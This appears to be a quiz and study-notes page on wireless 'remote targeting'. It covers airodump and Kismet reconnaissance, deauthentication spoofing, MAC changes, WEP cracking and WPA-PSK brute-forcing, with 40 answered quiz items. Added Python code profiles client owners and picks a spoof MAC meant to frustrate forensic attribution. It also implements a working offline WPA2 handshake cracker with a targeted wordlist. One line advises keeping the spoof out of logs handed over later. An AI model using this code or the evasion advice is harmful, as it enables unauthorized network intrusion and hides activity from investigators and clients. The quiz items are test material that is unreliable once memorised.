Remote Targeting Techniques - Part Two
40 Questions

Questions and Answers

What types of networks should be reviewed when analyzing data during Phase III of Remote Targeting?

  • WPA-Enterprise, Open networks, Captured packets, and Probing clients
  • WEP, Captured packets, Rogue access points, and Associated clients
  • WEP, WPA2-Personal, WPA-Enterprise, and hidden networks
  • WEP, WPA-PSK, WPA-Enterprise, and captured packets (correct)

Which file formats can Kismet and airodump log data into for further analysis?

  • CSV and JSON files
  • PCAP and XML files (correct)
  • HTML and MKV files
  • TXT and PDF files

What information can be derived from the probing clients feature during wireless reconnaissance?

  • Determination of the total number of packets sent
  • Identification of network equipment manufacturers
  • Detection of all cloaked networks in the vicinity
  • Indication of potential client device ownership (correct)

What does the OUI of a MAC address signify in wireless reconnaissance?

  • A unique identifier assigned to network device manufacturers (correct)

What action can be taken to potentially identify cloaked networks during analysis?

  • Spoof a disassociation message to force association (correct)

What is a key consideration when selecting a location for stealth physical reconnaissance?

  • It should be in a public or common area. (correct)

Which of the following methods can be used for wireless recon targeting vulnerabilities?

  • Cracking WEP encryption. (correct)

What technique can be employed to maintain anonymity in an active wireless attack?

  • Changing the MAC address of the radio device. (correct)

During wardriving, what should a person be aware of regarding their surroundings?

  • Any observable actions may arouse suspicion. (correct)

What is the purpose of using devices like phones or tablets in a stealth physical recon?

  • To remotely connect for reconnaissance purposes. (correct)

What is the correct method to change a MAC address using a Linux terminal?

  • Bring the interface down, set the hardware address, and bring it back up: ifconfig wlan0 down, then ifconfig wlan0 hw ether 22:44:66:11:22:23, then ifconfig wlan0 up (correct)

Which strategy can be implemented to interfere with forensic investigations in wireless activities?

  • Setting the MAC address to be one digit different from a valid client MAC. (correct)

What is the purpose of the aireplay-ng command exemplified in the message spoofing?

  • To disassociate client devices without detection (correct)

Why is it essential to enumerate client info after wireless recon?

  • To identify the organization's client devices for targeted attacks (correct)

Which protocol is NOT mentioned as potentially revealing client device information?

  • FTP (correct)

What foundational strategy should one adhere to during stealth physical reconnaissance?

  • Maintain a low profile and act congruently with your narrative (correct)

In which situation would it be necessary to perform client enumeration?

  • When the identity of the network is ambiguous or unverified (correct)

What critical information might a DHCP request reveal?

  • Device hostname (correct)

Which element is emphasized as part of effective stealth during physical recon?

  • Acting congruently with a preplanned story (correct)

What is the primary advantage of capturing packets during wireless recon?

  • To obtain data indicative of device ownership and types (correct)

The OUI of a MAC address consists of the first six decimal digits.

  • False (correct)

Both Kismet and airodump are capable of logging data to PCAP files for analysis.

  • True (correct)

Any client device will always probe for other configured networks while connected to a single network.

  • False (correct)

Spoofing a disassociation message can aid in identifying cloaked networks during wireless reconnaissance.

  • True (correct)

A captured packet log will often contain the total number of packets sent from each device.

  • True (correct)

The aireplay-ng command can be used to send a disassociation message that appears legitimate to the client device.

  • True (correct)

The NetBIOS protocol can only reveal the internet protocol address of the client device.

  • False (correct)

Performing wireless reconnaissance does not require any physical presence.

  • False (correct)

Capturing packets during wireless network recon can assist in identifying the ownership of client devices.

  • True (correct)

The DHCP protocol does not provide any device-specific information.

  • False (correct)

To maintain anonymity during wireless attacks, it is crucial to adhere to the APT strategy of KISS.

  • True (correct)

Social engineering techniques have no relevance in the context of wireless reconnaissance.

  • False (correct)

Client device information can also be derived from HTTP requests which may show server names in cleartext.

  • True (correct)

Aerial drones are commonly utilized by private individuals for stealth physical reconnaissance.

  • False (correct)

Cracking WEP is one of the major vulnerabilities targeted during active wireless attacks.

  • True (correct)

Changing your MAC address is a complex process that cannot be done from a Linux terminal.

  • False (correct)

Wardriving can only be conducted from a parked vehicle.

  • False (correct)

It is recommended to set your MAC address to match exactly one of the valid client MAC addresses during active recon.

  • False (correct)

Multiple wireless vendor vulnerabilities are not significant in identifying weaknesses within wireless networks.

  • False (correct)

To maintain anonymity during wireless activities, using a MAC address differing by only one digit is an effective strategy.

  • True (correct)

    Study Notes

    Phase III: Remote Targeting - Part Two

    • This phase involves reviewing data from reconnaissance for useful information.
    • Wireless networks are categorized by their security protocol:
      • WEP (Wired Equivalent Privacy)
      • WPA-PSK (WPA Pre-Shared Key Mode)
      • WPA-Enterprise (WPA Enterprise Mode)
    • Captured packets and associated clients are also examined.
    • Kismet and airodump-ng log captures to PCAP (plus XML summaries) that can be opened in Wireshark for analysis.
    • PCAP files provide basic information, including:
      • BSSID (Basic Service Set Identifier)
      • Client devices
      • Associated clients
      • Probing clients
      • Channels
    • Tools log additional data, including:
      • Timestamps of client and network activity
      • Packet counts from each device
      • Packets observed
      • Wireless networks probed by a client device
    • This information helps identify potential target organization clients.
    • Probed networks may indicate client ownership.
      • If a probe for a known employee's network is seen, it may suggest the owner.
      • Not all clients probe all networks.
    • SSID (Service Set Identifier) information can be helpful in identifying the target organization.
    • The OUI (Organizationally Unique Identifier) of each BSSID and client MAC address is recorded.
    • The OUI is the first six hexadecimal digits (three bytes) of the MAC address, assigned by the IEEE to the equipment manufacturer, so it identifies the vendor of the device.
    • Cloaked (hidden-SSID) networks beacon an empty SSID and require extra enumeration to learn the name.
    • Spoofing a disassociation (deauthentication) message to a connected client with aireplay-ng forces it to re-associate, and the SSID appears in the association exchange.
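
The review described in the list above, as an added example that is not code from the page or from the aircrack-ng project: it parses a constructed airodump-ng style CSV (the column names are airodump-ng's; the exact separators, all MACs, SSIDs and timestamps are invented for the example, the OUI table is a constructed excerpt of the IEEE registry, and the employee-to-home-SSID mapping stands in for what OSINT would supply) and pulls out what Phase III looks for: networks by class, WEP IV counts, cloaked networks with candidate names taken from probe requests of the right length, probable client owners from probed networks, vendors from OUIs, and the busiest clients by packet count.

```python
"""Phase III triage of an airodump-ng style CSV log (added example, not page code)."""
from collections import defaultdict

# Constructed sample log, modelled on airodump-ng's two tables (access points, then
# stations). MACs, SSIDs and times are invented; the separators are an assumption.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:0C:29:AA:BB:01, 2024-03-01 09:00:00, 2024-03-01 09:30:00, 6, 54, WPA2, CCMP, PSK, -41, 900, 0, 0.0.0.0, 8, ACME-Ops,
00:0C:29:AA:BB:02, 2024-03-01 09:00:00, 2024-03-01 09:30:00, 11, 54, WPA2, CCMP, MGT, -48, 870, 0, 0.0.0.0, 10, ACME-Staff,
F0:9F:C2:10:20:30, 2024-03-01 09:01:00, 2024-03-01 09:29:00, 1, 54, WPA2, CCMP, PSK, -55, 400, 0, 0.0.0.0, 7, ,
B8:27:EB:00:11:22, 2024-03-01 09:02:00, 2024-03-01 09:28:00, 6, 54, WEP, WEP, , -60, 300, 2200, 0.0.0.0, 6, Lab-AP,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:50:56:11:22:33, 2024-03-01 09:05:00, 2024-03-01 09:30:00, -50, 1340, 00:0C:29:AA:BB:02, ACME-Staff,Smith-Home
00:50:56:11:22:34, 2024-03-01 09:06:00, 2024-03-01 09:29:00, -52, 220, (not associated), ACME-Ops,AcmeLab
B8:27:EB:44:55:66, 2024-03-01 09:10:00, 2024-03-01 09:20:00, -70, 15, (not associated),
"""

# Constructed excerpt of the IEEE OUI registry; a real run consults the full list
# (for example Wireshark's manuf file).
OUI_VENDORS = {"00:0C:29": "VMware", "00:50:56": "VMware",
               "B8:27:EB": "Raspberry Pi Foundation", "F0:9F:C2": "Ubiquiti"}


def vendor(mac):
    """Vendor from the OUI: the first three bytes (six hex digits) of the MAC."""
    return OUI_VENDORS.get(mac.upper()[:8], "unknown")


def category(ap):
    """Map airodump's Privacy/Authentication columns onto the page's network classes."""
    if ap["privacy"].startswith("WEP"):
        return "WEP"
    if ap["privacy"].startswith("WPA"):
        return "WPA-Enterprise" if ap["auth"] == "MGT" else "WPA-PSK"
    return "Open"


def parse_airodump_csv(text):
    """Split the log into AP and station records (ESSIDs containing commas are not handled)."""
    aps, stations, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "sta"
            continue
        f = [x.strip() for x in line.split(",")]
        if section == "ap":
            aps.append({"bssid": f[0], "channel": int(f[3]), "privacy": f[5], "auth": f[7],
                        "beacons": int(f[9]), "ivs": int(f[10]), "id_length": int(f[12]),
                        "essid": f[13]})
        elif section == "sta":
            stations.append({"mac": f[0], "packets": int(f[4]), "bssid": f[5],
                             "probes": [p for p in f[6:] if p]})
    return aps, stations


def triage(text, employee_ssids):
    """Summarise what the Phase III review looks for.

    employee_ssids maps a personal/home SSID learned from OSINT to a person; a client
    probing for that SSID is a candidate owner (assumed mapping, not from the page).
    """
    aps, stations = parse_airodump_csv(text)
    by_class = defaultdict(list)
    for ap in aps:
        by_class[category(ap)].append(ap["bssid"])
    probed = {p for s in stations for p in s["probes"]}
    # A cloaked AP beacons an empty ESSID but still advertises its length; probe requests
    # of that length are candidates until a forced re-association confirms the name.
    cloaked = {ap["bssid"]: sorted(p for p in probed if len(p) == ap["id_length"])
               for ap in aps if ap["essid"] == "" and ap["id_length"] > 0}
    owners = {s["mac"]: employee_ssids[p]
              for s in stations for p in s["probes"] if p in employee_ssids}
    return {
        "by_class": dict(by_class),
        "wep_ivs": {ap["bssid"]: ap["ivs"] for ap in aps if category(ap) == "WEP"},
        "cloaked": cloaked,
        "owners": owners,
        "vendors": {s["mac"]: vendor(s["mac"]) for s in stations},
        "busiest": [s["mac"] for s in sorted(stations, key=lambda s: -s["packets"])],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_CSV, {"Smith-Home": "J. Smith"}), indent=2))
```

The WEP IV count is the figure that matters for the cracking section later on the page, and the probe-length match for cloaked networks is only a hint: a 7-character probe from an unrelated client is a coincidence, so confirm with a forced re-association before targeting.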

    Active Recon II

    • Changing MAC addresses is necessary for active attacks.
    • To change the MAC address from a Linux terminal, bring the interface down, set the new hardware address with hw ether, then bring it back up.
    • Example, setting the MAC address to 22:44:66:11:22:23:
      • root@kali:~# ifconfig wlan0 down
      • root@kali:~# ifconfig wlan0 hw ether 22:44:66:11:22:23
      • root@kali:~# ifconfig wlan0 up
    • Using a different wireless card (not the one used for earlier reconnaissance) is recommended if possible.

    Active Wireless Attacks

    • Major vulnerabilities in wireless networks include:
      • WEP cracking
      • Offline brute-forcing of WPA pre-shared keys
      • Active brute-forcing of WiFi Protected Setup
      • Multiple wireless vendor vulnerabilities
    • MAC address changes are important for active attacks.
    • Spoof a MAC address that is one hex digit off a valid client MAC rather than an exact copy: it still blends in with the target's hardware, avoids colliding with the live client, and complicates later forensic attribution.
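
One way to apply the one-digit-offset rule, as an added example that is not from the page: it derives a spoof address from an observed client MAC while keeping the OUI intact (so the vendor, multicast and locally-administered bits still match real hardware) and skips any address already seen on the air. The MAC addresses are invented.

```python
"""Pick a spoofed MAC one hex digit off an observed client (added example, not page code)."""
import re

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$")


def digit_distance(a, b):
    """Number of hex digits in which two colon-separated MAC addresses differ."""
    return sum(x != y for x, y in zip(a.upper().replace(":", ""), b.upper().replace(":", "")))


def one_digit_off(client_mac, observed_macs):
    """Return a MAC differing from client_mac in exactly one hex digit of the NIC-specific
    half (last three bytes). Leaving the OUI alone keeps the vendor lookup, the I/G
    (multicast) bit and the U/L bit identical to the real client. Candidates already
    seen in the capture are skipped so the spoof does not collide with a live device."""
    mac = client_mac.upper()
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {client_mac}")
    seen = {m.upper() for m in observed_macs} | {mac}
    chars = list(mac)
    # NIC-specific hex digits, least significant first (string indices skip the colons).
    for pos in (16, 15, 13, 12, 10, 9):
        for d in "0123456789ABCDEF":
            if d == chars[pos]:
                continue
            candidate = "".join(chars[:pos] + [d] + chars[pos + 1:])
            if candidate not in seen:
                return candidate
    raise RuntimeError("no free one-digit variant; pick a different client")


if __name__ == "__main__":
    print(one_digit_off("00:50:56:11:22:33", ["00:50:56:11:22:33", "00:50:56:11:22:34"]))
```

The returned address is what goes into the ifconfig ... hw ether step above; rerun the capture after switching so the spoof is not also sitting in the log you hand over later.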

    WEP Cracking

    • WEP cracking relies on packet capture: the key is recovered from the IVs carried in captured data frames.
    • The number of packets needed varies, typically between 2,000 and 200,000.
    • Passive capture alone may take 15+ minutes and about 20,000 packets before the key can be recovered.
    • airodump-ng is a good tool for the initial packet capture.
    • The airmon-ng command puts the wireless interface into monitor mode first.
    • Example command format: root@kali:~# airmon-ng start wlan0

    WPA Preshared Key Cracking

    • WPA-PSK vulnerabilities are often exploited by brute-forcing offline.
    • Capturing the four-way handshake between a client and the access point is critical; it contains everything needed to test candidate keys offline.
    • Default WPA pre-shared keys on residential access points are less secure.
    • airodump-ng is used to monitor network traffic.
    • The command to capture traffic on the target's channel and BSSID is typically: airodump-ng -w <filename> -c <channel> --bssid <BSSID> mon0 (mon0 being the monitor-mode interface created by airmon-ng).
    • If no handshake appears, spoofing a disassociation message to a connected client forces it to re-associate and perform the handshake again.
    • Create a wordlist using relevant information (company name, phone numbers, etc).
    • hashcat can then be used to test the wordlist against the captured handshake offline.
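
The offline attack end to end, as an added example that is not from the page and not hashcat's own code: a targeted wordlist built from company name, phone number and years, and a check of each candidate against the message-2 MIC of a four-way handshake using the IEEE 802.11i derivations (PMK = PBKDF2-HMAC-SHA1 over the SSID, PTK = PRF-512, MIC = HMAC-SHA1 with the KCK for WPA2/CCMP). The handshake (SSID, MACs, nonces and EAPOL frame) is constructed inline with a known passphrase so the example runs without a capture; all names and values in it are invented.

```python
"""Offline WPA2-PSK dictionary attack against a four-way handshake (added example)."""
import hashlib
import hmac
import re


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from 802.11i; only the first 16 bytes (the KCK) are needed to check the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]


MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC


def split_mic(eapol_frame):
    """Return (frame with the MIC field zeroed, the 16-byte MIC) from a captured EAPOL-Key frame."""
    mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return zeroed, mic


def msg2_mic(kck, eapol_zeroed):
    """WPA2/CCMP key descriptor: MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Test each candidate against the captured handshake; no traffic to the AP is needed."""
    zeroed, captured = split_mic(eapol_frame)
    for candidate in wordlist:
        kck = ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(msg2_mic(kck, zeroed), captured):
            return candidate
    return None


def targeted_wordlist(company, phones, years):
    """Seed the list with the page's suggestions (company name, phone numbers) plus years.
    WPA-PSK passphrases are 8..63 characters, so anything outside that range is dropped."""
    words = set()
    for base in {company, company.lower(), company.upper(), company.capitalize()}:
        words.add(base)
        for year in years:
            words.update({f"{base}{year}", f"{base}{year}!", f"{base}@{year}"})
        for phone in phones:
            digits = re.sub(r"\D", "", phone)
            words.update({digits, f"{base}{digits[-4:]}"})
    return sorted(w for w in words if 8 <= len(w) <= 63)


def build_msg2(snonce, mic, rsn_ie):
    """Assemble a supplicant EAPOL-Key message 2 (constructed; WPA2/CCMP key-info 0x010a)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def sample_handshake():
    """Constructed 'capture' for SSID ACME-Ops; the passphrase is what the attack recovers."""
    ssid, secret = "ACME-Ops", "Acme2021!"
    ap_mac, sta_mac = bytes.fromhex("000c29aabb01"), bytes.fromhex("005056112233")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    kck = ptk(pmk_from_passphrase(secret, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = msg2_mic(kck, build_msg2(snonce, b"\x00" * 16, rsn_ie))
    return ssid, ap_mac, sta_mac, anonce, snonce, build_msg2(snonce, mic, rsn_ie)


def demo():
    ssid, ap_mac, sta_mac, anonce, snonce, frame = sample_handshake()
    words = targeted_wordlist("Acme", ["555-123-4567"], [2019, 2020, 2021])
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, frame, words)


if __name__ == "__main__":
    print("recovered:", demo())
```

In a real engagement the same fields are read from the capture file written by airodump-ng -w (Wireshark's EAPOL dissector shows the nonces and MIC), and hashcat performs exactly this PBKDF2-plus-MIC check, only on a GPU and across a far larger list; the 4096 PBKDF2 iterations per candidate are what make a short, targeted wordlist worth building first.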

    Description

    Explore the critical aspects of Phase III in Remote Targeting, focusing on the review of reconnaissance data. This phase emphasizes understanding wireless network security protocols, analyzing captured packets, and the use of tools like Kismet and Wireshark for effective network analysis.
